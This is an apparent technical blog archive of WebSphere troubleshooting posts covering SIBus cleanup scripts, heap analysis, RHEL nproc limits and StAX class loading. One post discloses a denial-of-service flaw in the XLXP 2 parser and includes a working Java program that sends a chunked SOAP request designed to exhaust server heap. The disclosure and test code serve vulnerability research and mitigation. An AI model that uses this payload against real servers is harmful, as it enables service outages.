Thursday, October 31, 2013

How to get rid of SIBus queue points in state DELETE_PENDING

Sometimes, when deleting a destination from a SIBus, the corresponding queue point is not deleted from the underlying messaging engine, but remains in state DELETE_PENDING. This manifests itself in three ways:

  1. The queue point is still visible in the runtime view of the messaging engine in the admin console. To see this, go to the admin console page for the messaging engine, switch to the "Runtime" tab and then click on "Queue points".

  2. The MBean for the queue point is still registered by the messaging engine. The state attribute of that MBean will have value DELETE_PENDING.

  3. Each time the messaging engine is started, the following message appears in the logs:

    CWSIP0063I: The local destination <name> with UUID <uuid> has been marked for deletion.

It is not exactly clear under which conditions this issue occurs, but apparently it has to do with the existence of remote queue points, i.e. with the production or consumption of messages through a remote messaging engine.

To clean up these queue points and eliminate the recurring CWSIP0063I messages, use the following wsadmin script:

objName = AdminControl.makeObjectName('WebSphere:type=SIBQueuePoint,*')
queuepoints = AdminControl.queryNames_jmx(objName, None)
for queuepoint in queuepoints:
    name = queuepoint.getKeyProperty("name")
    if (not name.startswith("_") and AdminControl.invoke_jmx(queuepoint, 'getState', [], []) == 'DELETE_PENDING'):
        print 'Found SIBQueuePoint in state DELETE_PENDING: ' + name
        irs = AdminControl.invoke_jmx(queuepoint, 'listInboundReceivers', [], [])
        for ir in irs:
            AdminControl.invoke_jmx(queuepoint, 'flush', [ir], ['com.ibm.websphere.sib.admin.SIBInboundReceiver'])
            print 'Called flush on SIBQueuePoint for inbound receiver: ' + name
        cts = AdminControl.invoke_jmx(queuepoint, 'listRemoteConsumerTransmitters', [], [])
        for ct in cts:
            AdminControl.invoke_jmx(queuepoint, 'flush', [ct], ['com.ibm.websphere.sib.admin.SIBRemoteConsumerTransmitter'])
            print 'Called flush on SIBQueuePoint for remote consumer transmitter: ' + name
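
The script can be run with wsadmin in Jython mode while the messaging engine is running, for example as follows (the script file name is only an example):

wsadmin.sh -lang jython -f cleanup_queuepoints.py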

Update:

  • The flush operations used by the script are actually deprecated, but the documentation doesn't specify which operations should be used instead.
  • The script may fail because the queue point may already be deleted after the flush of the SIBInboundReceiver objects. In that case the subsequent operations fail because the MBean no longer exists. As a workaround, simply re-execute the script.

Sunday, October 27, 2013

Heap starvation on WebSphere Process Server 6.1 caused by internal cache

Some time ago we had an incident where both members of a WebSphere Process Server 6.1 cluster encountered heap starvation and needed to be restarted.

The incident occurred after one of the external service providers we connect to experienced a problem that caused an increase in response times.

Analysis of a heap dump taken before the restart of the WPS servers showed that a large amount of heap (480MB of 1.4GB) was consumed by objects of type com.ibm.ws.sca.internal.webservice.handler.PortHandler$OperationHandlerList. That appears to be an internal data structure used by SCA Web service imports (we run a large number of SCA modules on that cluster). A closer look at OperationHandlerList reveals that this class acts as a cache for objects of type com.ibm.ws.webservices.engine.client.Call, which is WebSphere's implementation of the javax.xml.rpc.Call API.

In fact, Call objects are used during the invocation of an operation on an SCA import with Web service binding, but they are both stateful and costly to create. To avoid this cost, WPS uses a caching mechanism that takes into account the stateful nature of these objects. Basically, OperationHandlerList appears to be designed as a pool of Call objects that is initially empty and that has a hardcoded maximum size of 100 entries. When an SCA import is invoked, WPS will attempt to retrieve an existing Call object from the pool or create a new one if none is available. After the completion of the invocation, WPS then puts the instance (back) into the pool for later reuse.

What is important to understand is that there is a separate pool (i.e. a separate OperationHandlerList instance) for each operation defined by each SCA Web service import. In addition, entries in these pools are never expunged. From the explanation given in the previous paragraph it is easy to see that the number of Call objects stored in a given OperationHandlerList instance is equal to the maximum concurrency reached (since the start of the server) for invocations of the corresponding operation. That explains why the heap consumed by these pools may increase sharply after a performance problem with one of the Web services consumed by WPS: in general, a degraded response time of a service provider will cause an increase in concurrency because clients continue to send requests to WPS. It also explains why the memory is never released and why the issue has the same symptoms as a memory leak.
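
To make this behaviour more concrete, here is a minimal sketch of a pool that behaves as described above. It is purely illustrative (class and method names are invented) and is not IBM's actual OperationHandlerList implementation:

import java.util.concurrent.ConcurrentLinkedQueue;
import java.util.function.Supplier;

// Illustrative only: a bounded pool that is initially empty, grows on demand and
// never shrinks, so its steady-state size equals the peak concurrency observed.
public class BoundedObjectPool<T> {
    private static final int MAX_SIZE = 100; // hardcoded maximum, as observed for OperationHandlerList
    private final ConcurrentLinkedQueue<T> pool = new ConcurrentLinkedQueue<T>();
    private final Supplier<T> factory;

    public BoundedObjectPool(Supplier<T> factory) {
        this.factory = factory;
    }

    public T acquire() {
        T instance = pool.poll();                            // reuse a pooled instance if available...
        return instance != null ? instance : factory.get();  // ...otherwise create a new one
    }

    public void release(T instance) {
        if (pool.size() < MAX_SIZE) {  // entries are never expunged, only capped at 100
            pool.offer(instance);
        }
    }
}

If N requests invoke the same operation concurrently, N instances are created and all N are put back into the pool afterwards; the memory they occupy is only released when the server is restarted.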

As indicated above, there is a separate pool for each operation. This means that there may be a large number of these pools in a given WPS instance. However, this is usually not what causes the problem. The issue can already occur if the maximum concurrency increases for only a limited number of operations. The reason is that an individual Call object may consume a significant amount of memory. For example, in our case we found one OperationHandlerList instance (that had reached its maximum capacity of 100 entries) that alone accounted for 177MB of used heap.

Note: At first glance, the issue described in this post seems to match APAR JR35210. However, that APAR simply describes the problem as a memory leak without giving precise information about the conditions that trigger it, except that it relates the issue to the usage of dynamic endpoints. Our findings indicate that the issue is not (necessarily) related to dynamic endpoints, so JR35210 may actually be a different (but related) issue.

Saturday, October 26, 2013

WebSphere problems related to new default nproc limit in RHEL 6

We recently had an incident on one of our production systems running under Red Hat Enterprise Linux where under certain load conditions WebSphere Application Server would fail with an OutOfMemoryError with the following message:

Failed to create a thread: retVal -1073741830, errno 11

Error number 11 corresponds to EAGAIN and indicates that the C library function creating the thread fails because of insufficient resources. Often this is related to native memory starvation, but in our case it turned out that it was the nproc limit that was reached. That limit puts an upper bound on the number of processes a given user can create. It may affect WebSphere because in this context, Linux counts each thread as a distinct process.

Starting with RHEL 6, the soft nproc limit is set to 1024 by default, while in previous releases this was not the case. The corresponding configuration can be found in /etc/security/limits.d/90-nproc.conf. Generally a WebSphere instance only uses a few hundred threads, so this problem may go unnoticed for some time before being triggered by an unusual load condition. You should also take into account that the limit applies to the sum of all threads created by all processes running with the same user as the WebSphere instance. In particular it is not unusual to have IBM HTTP Server running with the same user on the same host. Since the WebSphere plug-in uses a multithreaded processing model (and not an asynchronous one), the nproc limit may be reached if the number of concurrent requests increases too much.
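
If you want to observe the limit from the JVM's perspective, a throwaway test program like the following (not part of the original incident analysis) can be run as the user in question. It simply creates idle daemon threads until thread creation fails; note that with a high nproc limit it may hit native memory limits before reaching the nproc limit:

public class ThreadLimitTest {
    public static void main(String[] args) {
        int count = 0;
        try {
            while (true) {
                Thread t = new Thread(new Runnable() {
                    public void run() {
                        try {
                            Thread.sleep(Long.MAX_VALUE); // keep the thread alive but idle
                        } catch (InterruptedException e) {
                            // ignore
                        }
                    }
                });
                t.setDaemon(true);
                t.start();
                count++;
            }
        } catch (Throwable e) {
            // with a low nproc limit this is typically an OutOfMemoryError
            // ("Failed to create a thread" on IBM JDKs)
            System.out.println("Thread creation failed after " + count + " threads: " + e);
        }
    }
}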

One solution is to remove or edit the 90-nproc.conf file to increase the nproc limit for all users. However, since the purpose of the new default value in RHEL 6 is to prevent accidental fork bombs, it may be better to define new hard and soft nproc limits only for the user running the WebSphere instance. While this is easy to configure, there is one other problem that needs to be taken into account.

For some unknown reason, sudo (in contrast to su) is unable to set the soft limit for the new process to a value larger than the hard limit set on the parent process. If that occurs, instead of failing, sudo creates the new process with the same soft limit as the parent process. This means that if the hard nproc limit for normal users is lower than the soft nproc limit of the WebSphere user and an administrator uses sudo to start a WebSphere instance, then that instance will not have the expected soft nproc limit. To avoid this problem, you should do the following:

  • Increase the soft nproc limit for the user running WebSphere.
  • Increase the hard nproc limit for all users to the same (or a higher) value, keeping the soft limit unchanged (to avoid accidental fork bombs); see the example below.
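
For example, assuming the WebSphere instance runs as a (hypothetical) user named wasadmin and that 8192 is an appropriate value for the workload, this could be done with an additional file in /etc/security/limits.d/ (the file name and the values are placeholders):

# e.g. /etc/security/limits.d/91-websphere.conf
wasadmin  soft  nproc  8192
wasadmin  hard  nproc  8192
*         hard  nproc  8192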

Note that you can verify that the limits are set correctly for a running WebSphere instance by determining the PID of the instance and checking the /proc/<pid>/limits file.

Wednesday, October 16, 2013

Quote of the day

The United States of America is prepared to use all elements of our power, including military force, to secure our core interests in the region. We will confront external aggression against our allies and partners, as we did in the Gulf War. We will ensure the free flow of energy from the region to the world. Although America is steadily reducing our own dependence on imported oil, the world still depends on the region’s energy supply, and a severe disruption could destabilize the entire global economy.

Barack Obama, Address to the United Nations General Assembly, 2013.

I guess no other US president ever openly expressed the imperialist nature of American foreign policy that clearly...

Friday, October 11, 2013

Broken by design: WebSphere's default StAX implementation (part 1)

Recently I came across an issue in WebSphere's default StAX implementation (XLXP 2) where the parser unexpectedly consumed a huge amount of heap. The issue was triggered by a gzipped XML file containing a base64 encoded PDF document with several megabytes of content. A test showed that although the size of the XML document was on the order of 10 MB, XLXP 2 required almost 1 GB of heap to parse the document (without any additional processing). That is of course totally unexpected: for large documents, an XML parser should never require an amount of heap 100 times as large as the size of the XML document.

After investigating the issue (with the XLXP 2 version in WAS 8.5.0.2), it turned out that the problem with IBM's parser is caused by the combination of three things:

  • Irrespective of the value of the javax.xml.stream.isCoalescing property (XMLInputFactory.IS_COALESCING), the parser will always return a text node in the input document as a single CHARACTERS event (where the precise meaning of "text node" is a sequence of CharData and/or Reference tokens neither preceded nor followed by a CharData or Reference token).

    For readers who are not experts in the StAX specification, this requires some additional explanations. With respect to coalescing, the only requirement stipulated by StAX (which is notoriously underspecified) is that enabling coalescing mode "requires the processor to coalesce adjacent character data". There are two interpretations of this requirement:

    • The first one is that this requirement is simply related to how CDATA sections are processed. If coalescing is enabled, then CDATA sections are implicitly converted to text nodes and merged with adjacent text nodes. In non coalescing mode, CDATA sections are reported as distinct events, such that there is one and only one event for each text node and CDATA section in the input document. This interpretation corresponds to the definition of coalescing used by DOM (see DocumentBuilderFactory#setCoalescing()).
    • The second interpretation goes a step further and assumes that in non coalescing mode, the parser should handle text nodes in a way similar to SAX, i.e. split text nodes that are larger than the parser's input buffer into chunks. In this case, a text node is reported as one or more CHARACTERS events. This allows the parser to process text nodes of arbitrary length with constant memory.

    BEA's original reference implementation and XLXP 2 are based on the first interpretation, while SJSXP (the StAX implementation in Oracle's JRE) and Woodstox use the second interpretation. Note that for applications using StAX, this doesn't really make any difference, because an application using a StAX parser in non coalescing mode must be written such that it is able to correctly process any sequence of CHARACTERS and CDATA events (see the sketch after this list).

  • XLXP 2 uses a separate buffer for each read operation on the underlying input stream, i.e. for each read operation, the parser will either allocate a new buffer or recycle a previously created buffer that is no longer in use. That is the case even if the previous read operation didn't fill the buffer completely: XLXP 2 will not attempt to read data into the buffer used during the previous read operation. By default, the size of each buffer is 64 KB.

  • When processing character data, the buffers containing the corresponding (encoded) data from the underlying stream remain in use (i.e. cannot be recycled) until the data has been reported back to the application. Note that this is a design choice: the parser could as well have been designed to accumulate the decoded character data in an intermediary buffer and immediately release the original buffers.
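
As mentioned above, here is a minimal sketch (not from the original post) of how an application can collect the character data of an element so that it works with either interpretation, i.e. regardless of whether a text node is reported as a single CHARACTERS event or as multiple chunks:

import javax.xml.stream.XMLStreamConstants;
import javax.xml.stream.XMLStreamException;
import javax.xml.stream.XMLStreamReader;

public class TextCollector {
    // Assumes the reader is positioned on the START_ELEMENT of an element with pure text content;
    // this is essentially what XMLStreamReader#getElementText() does internally.
    public static String collectText(XMLStreamReader reader) throws XMLStreamException {
        StringBuilder buffer = new StringBuilder();
        int event = reader.next();
        while (event != XMLStreamConstants.END_ELEMENT) {
            if (event == XMLStreamConstants.CHARACTERS
                    || event == XMLStreamConstants.CDATA
                    || event == XMLStreamConstants.SPACE) {
                buffer.append(reader.getText()); // append each chunk; one or many per text node
            }
            event = reader.next();
        }
        return buffer.toString();
    }
}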

The combination of these three design choices has two consequences:

  • When processing a text node from the input document, all buffers containing chunks of data for that text node remain in use until the parser reaches the end of the text node.
  • If the read operations on the underlying input stream return less than the requested number of bytes (i.e. the buffer size), then these buffers will only be partially filled.

This means that processing a text node may require much more memory than one would expect based on the length of that text node. Since the default buffer size is 64 KB, in the extreme case (where each read operation on the input stream returns a single byte), the parser may need 65536 times more memory than the length of the text node. In the case I came across, the XML document contained a text node of around 9 million characters and the input stream was a GZIPInputStream which returned more or less 600 bytes per read operation. A simple calculation (9,000,000 bytes / 600 bytes per read ≈ 15,000 read operations, each tying up a 64 KB buffer, i.e. roughly 15,000 × 64 KB ≈ 940 MB) shows that XLXP 2 will require on the order of 900 MB of heap to process that text node.

IBM's reaction to this was that XLXP 2 is "working as designed" (!) and that the issue can be mitigated with the help of two system properties:

com.ibm.xml.xlxp2.api.util.encoding.DataSourceFactory.bufferLength
This system property specifies the size of the buffers described earlier. Setting it to a smaller value than the default 65536 bytes will reduce the amount of unused space. On the other hand, if the value is too small, this will obviously have an impact on performance. Note that the fact that this parameter is specified as a system property is especially unfortunate, because it will affect all applications running on a given WebSphere instance.
com.ibm.xml.xlxp2.api.util.Pool.STRONG_REFERENCE_POOL_MAXIMUM_SIZE
This property was introduced by APAR PM42465 and is related to pooling of XMLStreamReader objects, not buffers. Therefore it has no impact on the problem described here.
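
For example, the first of these two properties can be set as a generic JVM argument on the application server; the value shown here is only an illustration, not a recommendation:

-Dcom.ibm.xml.xlxp2.api.util.encoding.DataSourceFactory.bufferLength=8192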

However, it should be clear by now that adjusting these system properties doesn't eliminate the problem completely, unless one uses an unreasonably small buffer size. This raises another interesting question: considering that WebSphere's JAX-WS implementation relies on StAX and that XLXP 2 may under certain circumstances allocate an amount of heap that is several orders of magnitude larger than the message size, isn't that a vector for a denial-of-service attack? If it's possible to construct a request that tricks XLXP 2 into reading multiple small chunks from the incoming SOAP message, couldn't this be used to trigger an OOM error on the target application server?

It turns out that unfortunately this is indeed possible. The attack takes advantage of the fact that when WebSphere receives a POST request that uses the chunked transfer encoding, the Web container will deliver each chunk separately to the application. If the request is dispatched to a JAX-WS endpoint this means that each chunk is delivered individually to the StAX parser, which is exactly the attack vector we are looking for. To exploit this vulnerability, one simply has to construct a SOAP message with a moderately large text node (let's say 10000 characters) and send that message to a JAX-WS endpoint using 1-byte chunks (at least for the part containing the text node). To process that text node, XLXP 2 will have to allocate 10000 buffers, each one 64 KB in size (assuming that the default configuration is used), which means that more than 600 MB of heap are required.

The following small Java program can be used to test if a particular (JAX-WS endpoint on a given) WebSphere instance is vulnerable:

import java.io.IOException;
import java.io.OutputStream;
import java.net.Socket;

public class XLXP2DoS {
  private static final String CHARSET = "utf-8";
  
  public static void main(String[] args) throws Exception {
    String host = "localhost";
    int port = 9080;
    String path = "/myapp/myendpoint";
    Socket socket = new Socket(host, port);
    OutputStream out = socket.getOutputStream();
    out.write(("POST " + path + " HTTP/1.1\r\n"
        + "Host: " + host + ":" + port + "\r\n"
        + "Content-Type: text/xml; charset=" + CHARSET + "\r\n"
        + "Transfer-Encoding: chunked\r\n"
        + "SOAPAction: \"\"\r\n\r\n").getBytes("ascii"));
    writeChunk(out, "<s:Envelope xmlns:s='http://schemas.xmlsoap.org/soap/envelope/'>"
        + "<s:Header><p:dummy xmlns:p='urn:dummy'>");
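    // Send the text node as 10000 one-byte chunks, so that XLXP 2 reads each byte
    // into a separate (64 KB by default) buffer.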
    for (int i=0; i<10000; i++) {
      writeChunk(out, "A");
    }
    writeChunk(out, "</p:dummy></s:Header><s:Body/></s:Envelope>");
    out.write("0\r\n\r\n".getBytes("ascii"));
    socket.close();
  }
  
  private static void writeChunk(OutputStream out, String data) throws IOException {
    out.write((Integer.toHexString(data.length()) + "\r\n").getBytes("ascii"));
    out.write(data.getBytes(CHARSET));
    out.write("\r\n".getBytes("ascii"));
  }
}

The vulnerability has some features that make it rather dangerous:

  • Since the amount of heap used is several orders of magnitude larger than the message size, it is generally possible to carry out this attack even against application servers with a maximum POST request size configured in the HTTP transport channel settings.
  • An HTTP server in front of the application server doesn't protect against the attack. The reason is that the WebSphere plug-in forwards the chunks unmodified to the target server. The same will be true for most types of load balancers. For reverse proxies other than IBM HTTP Server this may or may not be true. On the other hand, a security gateway (such as DataPower) or an ESB will likely protect against this attack.
  • Since the request is relatively small, it will be difficult to distinguish from other requests and to trace back to its source.

One possible way to fix this vulnerability is to use another StAX implementation, as described in a previous post. In fact, switching the StAX implementation for a given Java EE application also changes the StAX implementation used to process SOAP messages for JAX-WS endpoints exposed by that application. Since WebSphere's JAX-WS implementation is based on Apache Axis2 and Apache Axiom, and the recommended StAX implementation for Axiom is Woodstox, that particular StAX implementation may be the best choice. Note that this may still have some unexpected side effects. In particular, XLXP 2 is known to implement some optimizations that are designed to work together with the JAXB 2 implementation in WebSphere. Obviously these optimizations will no longer work if XLXP 2 is replaced by Woodstox. It is also not clear if using WebSphere's JAX-WS implementation with a non-IBM StAX implementation is supported by IBM, i.e. if you will get help if there is an interoperability issue.

Update: IBM finally acknowledged that there is an issue with XLXP 2 (although they avoided qualifying it as a security issue). See the second part of this article for a discussion about the "fix" IBM applied to solve the issue.

Wednesday, October 2, 2013

Broken by design: changing the StAX implementation in a JEE application on WebSphere

To change the StAX implementation used in a Java EE application it should normally be enough to simply add the JAR with the third party StAX implementation (such as Woodstox) to the application. For example, if the application is a simple Web application, then it should be enough to add the JAR to WEB-INF/lib. The same is true for the SAX, DOM and XSLT implementations. The reason is that all these APIs (which are part of JAXP) use the so-called JDK 1.3 service provider discovery mechanism. That mechanism uses the thread context class loader to locate the service provider (the StAX implementation in this case). On the other hand, the Java EE specification requires that the application server sets the thread context class loader correctly before handing over a request to the application. For a servlet request, this will be the class loader of the Web module, while for a call to an EJB (packaged in an EJB-JAR), this will be the application class loader (i.e. the class loader corresponding to the EAR). That makes it possible to have different applications deployed on the same server use different StAX implementations without the need to modify these applications.
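
A simple way to check which StAX implementation the provider discovery actually selects for an application is to print the class name of the factory it returns. The following is only a minimal sketch (the class name is arbitrary); the same two lines can be used from a servlet of the deployed application:

import javax.xml.stream.XMLInputFactory;

public class StaxImplementationCheck {
    public static void main(String[] args) {
        // XMLInputFactory.newInstance() uses the thread context class loader to locate the provider
        XMLInputFactory factory = XMLInputFactory.newInstance();
        System.out.println("XMLInputFactory implementation: " + factory.getClass().getName());
        // With Woodstox visible to the application this prints com.ctc.wstx.stax.WstxInputFactory;
        // on WebSphere with parent first delegation you will instead see an XLXP 2 class.
    }
}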

All this works as expected on most application servers, except on WebSphere. On WebSphere, even with a third party StAX implementation packaged in the application, JAXP will still return the factories (XMLInputFactory, etc.) from the StAX implementation packaged with WebSphere, at least if the application uses the default (parent first) class loader delegation mode. Note that the implementation returned by JAXP is not the StAX implementation in the JDK shipped with WebSphere (which is XLXP 1), but the one found in plugins/com.ibm.ws.prereq.xlxp.jar (which is XLXP 2). The only way to work around this issue is to switch the delegation mode of the application or Web module to parent last (with all the difficulties that this implies on WebSphere) or to create a shared library with an isolated class loader (which always uses parent last delegation mode).

In this blog post I will explain why this is so and what this tells us about the internals of WebSphere. First of all, remember that starting with version 6.1, WebSphere actually runs in an OSGi container. That is, the WebSphere runtime is actually composed of a set of OSGi bundles. These are the files that you can find in the plugins directory in the WebSphere installation, and as mentioned earlier, the StAX implementation used by WebSphere is actually packaged in one of these bundles. If you are familiar with OSGi, then you should know that each bundle has its own class loader. This raises an interesting question: how is JAXP actually able to load that StAX implementation from the thread context class loader in a Java EE application?

To answer that question, let's have a look at the class loader hierarchy of a typical Java EE application deployed on WebSphere, as seen in the class loader viewer in the admin console.

Some of the class loaders in that hierarchy are easy to identify:

  • 1 and 2 are created by the JRE. They load the classes that are required to bootstrap the OSGi container in which WebSphere runs.
  • 6 and 7 are the class loaders for the application and the (Web or EJB) module.

The interesting things actually happen in class loader number 3 (of type org.eclipse.osgi.internal.baseadaptor.DefaultClassLoader). Unfortunately there is no way to see this in the admin console, but it turns out that this is actually the class loader for one of the OSGi bundles of the WebSphere runtime, namely com.ibm.ws.runtime.gateway. That bundle doesn't really contain any code, but its manifest has the following entry:

DynamicImport-Package: *

What this means is that all packages exported by all OSGi bundles are visible to the class loader of that bundle. In other words, class loader number 3 not only delegates to its parent, but it can also delegate to the class loader of any of the WebSphere OSGi bundles, including of course com.ibm.ws.prereq.xlxp.jar. This is why JAXP is able to load that StAX implementation.

Note that before loading the StAX implementation, JAXP first needs to locate it. It does this by doing a lookup of the relevant META-INF/services resource (e.g. META-INF/services/javax.xml.stream.XMLInputFactory). That resource request is also delegated to all OSGi bundles. It appears that class loader number 4 is somehow involved in this, but this detail is not really relevant for the present discussion. The important thing to remember is that in the class loader hierarchy of a Java EE application, there is a class loader that delegates class loading and resource requests to all OSGi bundles of the WebSphere runtime.

Obviously this particular class loader hierarchy was not designed specifically for StAX. It actually ensures that applications have access to the standard Java EE and WebSphere specific APIs contained in the WebSphere bundles.

Now it is easy to understand why it is not possible to override the StAX implementation if the application is configured with the default parent first delegation mode: the lookup of the META-INF/services resource will return the resource included in com.ibm.ws.prereq.xlxp.jar, not the one in the StAX implementation packaged with the application. This changes when switching to parent last delegation mode (either by changing the configuration of the application/module class loader or by configuring a shared library with isolated class loader): in this case, the META-INF/services resource from the third party StAX implementation is returned first.
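
To see this effect directly from within an application (e.g. from a servlet), a diagnostic sketch like the following (the class name is arbitrary) prints which copy of the provider configuration file wins for the current thread context class loader, as well as all copies that are visible:

import java.net.URL;
import java.util.Enumeration;

public class ProviderResourceCheck {
    public static void main(String[] args) throws Exception {
        ClassLoader tccl = Thread.currentThread().getContextClassLoader();
        String resource = "META-INF/services/javax.xml.stream.XMLInputFactory";
        // The single resource returned here is the one the JDK 1.3 discovery mechanism will read;
        // which copy it is depends on the class loader delegation mode of the application.
        System.out.println("Winning provider configuration: " + tccl.getResource(resource));
        // All copies of the resource that are visible to the application:
        Enumeration<URL> all = tccl.getResources(resource);
        while (all.hasMoreElements()) {
            System.out.println("Visible: " + all.nextElement());
        }
    }
}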

What has been said up to now applies to Java EE applications. On the other hand, WebSphere also uses StAX internally. E.g. the SCA runtime in WebSphere uses StAX to parse certain configuration files or deployment descriptors. This raises another interesting question. The JDK 1.3 service provider discovery mechanism has been designed with J2SE and J2EE environments in mind. On the other hand, it is a well known fact that this mechanism doesn't work well in an OSGi environment. The reason is that each OSGi bundle has its own class loader and that the thread context class loader is undefined in an OSGi environment. That is why well designed OSGi based containers don't load the StAX API classes (and other APIs that use the JDK 1.3 service provider discovery mechanism) from the JRE, but from custom bundles. Apache Geronimo and Apache ServiceMix are two examples of containers that ship such a custom StAX API bundle.

Although the details differ, these bundles share a common feature: the code is basically identical to the code in the JRE, except for the implementation of XMLEventFactory, XMLInputFactory and XMLOutputFactory. With respect to the code in the JRE, these classes are modified to use an alternate provider discovery mechanism that is compatible with OSGi.

WebSphere doesn't use this approach. There is no StAX API bundle, and both Java EE applications and the code in the WebSphere bundles use the API classes loaded from the JRE. The question is then how the JDK 1.3 service provider discovery mechanism can return the expected StAX implementation if it is triggered by code in the WebSphere runtime. Obviously, if the code in the WebSphere runtime is invoked by a Java EE application, then the thread context class loader is set as described earlier and there is no problem. The question therefore only applies to WebSphere code executed outside of the context of any Java EE application, e.g. during the server startup or during the processing of an incoming request that has not yet been dispatched to an application.

The answer is that WebSphere ensures that all threads it creates have the context class loader set by default to the com.ibm.ws.bootstrap.ExtClassLoader we already encountered in the class loader hierarchy for a Java EE application shown above (see class loader 4). This is the case e.g. for all threads in the startup thread pool (which as the name suggests is used during server startup) and all idle Web container threads. Since that class loader can delegate to any bundle class loader, the JDK 1.3 service provider discovery mechanism will indeed be able to locate the StAX implementation in the com.ibm.ws.prereq.xlxp.jar bundle.

To summarize, the difficulties to change the StAX implementation can be traced back to the combination of two decisions made by IBM in the design of WebSphere:

  1. The decision not to use the StAX implementation in the JRE, but instead to use another StAX implementation deployed as an OSGi bundle in the WebSphere runtime. (Note that this is specific to StAX. For SAX, DOM and XSLT, WebSphere uses the default implementations in the JRE. This explains why the issue described in this post only occurs for StAX.)
  2. The decision to use the StAX API classes from the JRE and therefore to rely on the JDK 1.3 service provider discovery mechanism. If IBM had chosen to use the same design pattern as Geronimo and ServiceMix (and others), then they could have implemented a modified provider discovery mechanism that doesn't need the META-INF/services resources to locate the default StAX implementation in the com.ibm.ws.prereq.xlxp.jar bundle.

The conclusion is that the need to switch to parent last delegation mode to make this work is a direct consequence of WebSphere's design. Whether one considers this as "working as designed" or "broken by design" is of course purely subjective... IBM support will tell you that it is working as designed and that changing the class loader delegation mode is not a workaround, but simply a requirement in order to use a third party StAX implementation. Your mileage may vary.